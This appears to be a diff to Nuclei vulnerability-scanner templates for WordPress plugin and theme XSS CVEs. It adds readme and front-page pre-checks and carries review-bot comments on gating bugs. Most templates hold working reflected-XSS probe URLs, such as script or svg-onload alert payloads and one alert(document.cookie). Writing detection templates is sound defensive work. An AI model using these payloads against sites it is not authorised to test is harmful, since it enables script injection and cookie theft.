b/http/cves/2019/CVE-2019-15713.yaml index cf985fcdd2f..7527b21aade 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -28,7 +28,22 @@ info: framework: wordpress tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'My Calendar' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 
diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 59b4f484ec3..a534eab2a91 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Download Manager' + - 'License:' + condition: and + - method: GET path: - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc' diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index f291a1d94e0..11534d13252 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/api-bearer-auth/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index d6f1527190c..4a815b9273b 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml 
@@ -30,7 +30,22 @@ info: framework: wordpress tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/checklist/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Checklist' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 096839afa5c..d634019074c 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -29,9 +29,24 @@ info: vendor: themeisle product: visualizer framework: wordpress - tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive,themeisle + tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle + +flow: http(1) && http(2) http: + - raw: + - | + GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Visualizer' + - 'Tested up to:' + condition: and + - method: POST path: - "{{BaseURL}}/wp-json/visualizer/v1/upload-data" diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index e3382d9c620..5ba0faf23a8 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml 
@@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Event Espresso' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb" diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index dd63e3b16a0..d43ca5a6998 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/eventON/' + - method: GET path: - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E' diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index a2978f95941..b70d824041b 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/themes/15zine/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/15zine/assets/' + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 5db9fe406c7..7bcf78f2f5f 100644 --- a/http/cves/2020/CVE-2020-7107.yaml 
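Review bot: The CVE-2020-36510 pre-check fetches `/wp-content/themes/15zine/readme.txt` but then matches on `'/wp-content/themes/15zine/assets/'`, which is a stylesheet/script URL fragment of the kind the other theme pre-checks (scoreme, jannah) look for in the front page, not something a theme's readme would normally contain. Either the request or the matcher looks like a copy-paste mismatch, and as written the internal matcher probably never fires, so the admin-ajax request never runs. I cannot see the 15zine readme from here, so pick whichever is intended: `GET / HTTP/1.1` with the current asset-path word, or keep the readme request and match on a token that actually appears in it (the theme name header line is the usual choice in this PR).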
+++ b/http/cves/2020/CVE-2020-7107.yaml @@ -31,7 +31,22 @@ info: framework: wordpress tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ultimate FAQ' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E" diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 99a2d6f8f55..d7aa9970265 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -31,7 +31,20 @@ info: framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'OpenID Connect Generic Client' + - method: GET path: - '{{BaseURL}}/wp-login.php?login-error=' diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 6139fdf3922..a0036efe60a 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Pie Register' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==" diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index 3e65c3f10a9..caed3b277cb 100644 
--- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Stop Spammers Spam Prevention' + - 'Tags:' + condition: and + - raw: - | POST /wp-login.php HTTP/1.1 diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 2398a39224c..bae76bc5e61 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -31,7 +31,20 @@ info: framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '= Simple Giveaways' + - method: GET path: - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index e7c875a97a8..3de31d351ca 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -30,7 +30,23 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/wp-content/themes/bello/readme.txt' + + stop-at-first-match: true + matchers: + - type: word + internal: true + words: + - 'wp-content/themes/bello/fonts' + - 'bold-themes.com/bello' + condition: or + - method: GET path: - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 
diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 83d91d2c74a..dc97a22d008 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/car-repair-services/css' + - '/wp-content/themes/car-repair-services/js' + - 'id="car-repair-services-' + condition: or + - method: GET path: - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 1fcfa36d490..cd31f1fb367 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/themes/jnews/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Change Log:' + - 'JNews -' + condition: and + - raw: - | POST /?ajax-request=jnews HTTP/1.1 diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index b9aeb55cd1b..56a867008a4 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml 
@@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/jannah/assets/' + - 'attachment-jannah-image-' + condition: or + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index b4e94057eaa..adfa0769fff 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -36,9 +36,6 @@ http: - | GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close matchers-condition: and matchers: diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index c91e2938d58..df03780015b 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml 
@@ -29,13 +29,26 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/jannah/assets/' + - 'attachment-jannah-image-' + condition: or + - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded action=tie_ajax_search&query[]= diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index e069f58f6ff..e1da5cf1394 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -49,6 +49,11 @@ http: words: - Marmoset Viewer + - type: word + part: header + words: + - text/html + - type: status status: - 200 diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index d739a52f93c..eb358e99182 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -29,7 +29,20 @@ info: framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/elementor/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Elementor Website Builder' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js" diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index 1e407e664c4..ca4ba342f66 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml 
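Review bot: The CVE-2021-24407 hunk drops `Content-Type: application/x-www-form-urlencoded` from a raw POST whose body is `action=tie_ajax_search&query[]=`; PHP only populates `$_POST` for form-encoded or multipart content types, and admin-ajax.php dispatches on the submitted `action`, so without that header the request most likely comes back as `0` and the XSS matcher never sees the reflected value. Unless nuclei injects a default content type for raw bodies (I do not believe it does), the header should stay: `Content-Type: application/x-www-form-urlencoded`. Removing `Accept: */*` here, and the Accept-Encoding/Accept-Language/Connection lines in the CVE-2021-24387 hunk above, is harmless since nuclei manages those itself; the rest of the POST and its matchers sit outside this hunk.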
@@ -31,7 +31,22 @@ info: framework: wordpress tags: cve,cve2022,swagger,xss,wordpress,embed_swagger_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Embed Swagger' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"
diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml
index 7037c42af5e..ce61bdccddc 100644
--- a/http/cves/2022/CVE-2022-1724.yaml
+++ b/http/cves/2022/CVE-2022-1724.yaml
@@ -31,7 +31,22 @@ info: framework: wordpress tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Simple Membership' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E'
diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml
index d651649e85a..99e67b0ed6a 100644
--- a/http/cves/2022/CVE-2022-2383.yaml
+++ b/http/cves/2022/CVE-2022-2383.yaml
@@ -30,7 +30,22 @@ info: framework: wordpress tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Feed Them Social' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml
index 48a84943cc2..7da7da7322d 100644
--- a/http/cves/2022/CVE-2022-2462.yaml
+++ b/http/cves/2022/CVE-2022-2462.yaml
@@ -29,7 +29,7 @@ info: vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh http: - method: POST
diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml
index b9a9ec3313c..4e5113822c8 100644
--- a/http/cves/2023/CVE-2023-0602.yaml
+++ b/http/cves/2023/CVE-2023-0602.yaml
@@ -43,6 +43,6 @@ http: dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - - 'contains(body_2, "") && contains(body_2, "twittee")' + - 'contains_all(body_2, "", "twittee")' condition: and # digest: 4a0a0047304502201516cf14498ef8587ad8764d885bb6e89fa7ad440961d8bdc6242a1b60606ebf022100958b5718c780c80c3c5b796cbe6e1eedc4529e1b2bf6e7cd885d3848a121e258:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml
index a2a3b1a3a57..4cbe370dfe8 100644
--- a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml
+++ b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml
@@ -31,7 +31,7 @@ http: dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - - 'contains(body_2, "") && contains(body_2, "LDAP-authentication-intergrating-with-AD")' + - 'contains_all(body_2, "", "LDAP-authentication-intergrating-with-AD")' condition: and # digest: 4a0a0047304502200bce04c8d9eabc4702c702560e2457a66aad41c2d00028f8eaf7ae2a87237f42022100994299926a74ebd78085b7ada4602df0bf228769319370793ad5f76739c2b7a9:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
index 5e9faea1da0..a79a4642d8e 100644
--- a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
@@ -13,7 +13,20 @@ info: max-request: 1 tags: wordpress,wp-plugin,xss,wordfence +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wordfence/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Wordfence Security - ' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
diff --git a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
index 55d8de29c41..e84ccad08ca 100644
--- a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
@@ -17,7 +17,22 @@ info: max-request: 1 tags: wordpress,xss,wp,wpscan,intrusive +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-ticket/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP Ticket' + - 'Tags:' + condition: and + - raw: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
diff --git a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml
index 39cb2fdd1c2..885a84b69dc 100644
--- a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml
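Review bot: The single gate word in wordpress-wordfence-xss, `'Wordfence Security - '`, ends in a space inside the quotes, which is easy to lose in a reformat and ties the match to exact punctuation in the readme heading. If the intent is only to confirm the plugin's readme is being served, `- 'Wordfence Security'` together with `- 'Tags:'` and `condition: and`, as the neighbouring templates do, is less brittle. If the trailing ` - ` is there to exclude another product with the same prefix, a comment on the line saying so would stop the next editor from trimming it.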
@@ -17,7 +17,19 @@ info: max-request: 1 tags: wp-plugin,wp,edb,wpscan,wordpress,xss +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/ambience/' + - method: GET path: - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
diff --git a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
index e34fb8eda87..756fcb4cf48 100644
--- a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
@@ -16,7 +16,22 @@ info: max-request: 1 tags: wpscan,wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/custom-tables/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'custom tables' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/vulnerabilities/wordpress/wp-finder-xss.yaml b/http/vulnerabilities/wordpress/wp-finder-xss.yaml
index 83725e6f8f6..e8d3b0b8f68 100644
--- a/http/vulnerabilities/wordpress/wp-finder-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-finder-xss.yaml
@@ -15,7 +15,20 @@ info: max-request: 1 tags: xss,wp-plugin,packetstorm,wordpress +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/finder/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml
index 45c9c331cb3..5010af8e3a7 100644
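Review bot: In wp-custom-tables-xss the gate word `'custom tables'` is matched case-sensitively, so the template only proceeds if the readme contains that exact lowercase phrase; if the readme heading is title-cased, the gate never opens and the endpoint is never tested. CVE-2016-1000139 in this same series handles the identical situation with `case-insensitive: true`; either add that line under `condition: and` here or quote the phrase exactly as the readme spells it.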
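Review bot: The wp-finder-xss gate requests `GET /` and requires `/wp-content/plugins/finder/` in the front page, which only holds for plugins that enqueue an asset on the home page; a plugin that loads only on specific pages or inside wp-admin never appears there, so the vulnerable endpoint is never tested and the template fails closed without any signal. The readme probe used by the sibling hunks (`GET /wp-content/plugins/finder/readme.txt` plus a word from its heading) establishes presence independently of what the front page renders. The same front-page gate is used in wp-flagem-xss, wp-phpfreechat-xss, CVE-2011-5107, CVE-2012-0901, CVE-2014-4535, CVE-2014-4550, CVE-2014-4558, CVE-2016-1000136 and CVE-2022-0591; CVE-2014-4558 (a WooCommerce payment gateway) and CVE-2022-0591 (a form builder) look like the cases most likely to be missed. Theme gates such as wp-ambience-xss are unaffected, since a theme's assets are served on every page.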
--- a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml
@@ -16,7 +16,20 @@ info: max-request: 1 tags: wordpress,xss,wp-plugin,edb +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/FlagEm/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/vulnerabilities/wordpress/wp-knews-xss.yaml b/http/vulnerabilities/wordpress/wp-knews-xss.yaml
index 4a62cdfd0c1..d86ffb25f6b 100644
--- a/http/vulnerabilities/wordpress/wp-knews-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-knews-xss.yaml
@@ -16,7 +16,20 @@ info: max-request: 1 tags: wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/knews/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Knews Multilingual Newsletters' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml
index e1d4f593b8c..070c1df06f2 100644
--- a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml
@@ -16,7 +16,20 @@ info: max-request: 1 tags: wp-plugin,edb,wordpress,xss +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/nextgen-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '= NextGEN Gallery' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml
index 418cf0f5022..d6e306075b7 100644
--- a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml
@@ -16,7 +16,20 @@ info: max-request: 1 tags: xss,wp-plugin,edb,wordpress +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/phpfreechat/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml
index 8a8c6d7fa61..32f3d8d3446 100644
--- a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml
